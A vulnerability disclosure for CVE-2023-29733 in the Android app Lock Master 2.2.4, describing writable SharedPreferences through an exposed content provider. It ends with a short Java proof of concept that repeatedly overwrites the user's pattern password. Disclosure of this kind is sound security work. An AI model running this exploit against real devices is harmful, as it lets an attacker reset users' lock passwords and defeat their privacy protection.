CVE-2023-29733: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

Escalation of Privileges exists in Lock Master（CVE-2023-29733）

Vendor：DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product：Lock Master (com.ludashi.superlock)

Version：2.2.4

Download link：https://app-lock-master.en.uptodown.com/android/download

Description of the vulnerability for use in the CVE：The Lock Master app 2.2.4 for Android allows unauthorized apps to modify the values in its SharedPreference files. These files hold data that affects many app functions. Malicious modifications by unauthorized apps can cause security issues, such as functionality manipulation, resulting in a severe escalation of privilege attack.

Additional information：Lock Master is a security app, which can block access to user’s apps or files with lock patterns. Lock Master stores user-set PIN and pattern passwords, as well as important settings (such as the name of the app package that the user chooses to lock), in the SharedPreferences file. The file is loaded when the app is initialized and performs the corresponding operations. However, if a malicious application tampers with the data in the SharedPreferences file, it can control the relevant functions of the app, causing serious security consequences such as changing the user’s password and arbitrarily specifying the application to be locked.

poc：

ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.ludashi.superlock.main.SharedPrefProvider”);
ContentValues contentValues = new ContentValues(); while(true){ contentValues.put(“file_name","lock_config.xml”); contentValues.put("type",4); contentValues.put(“key","key_pattern_pwd”); contentValues.put(“value","123456”); contentResolver.update(uri, contentValues,null,null); }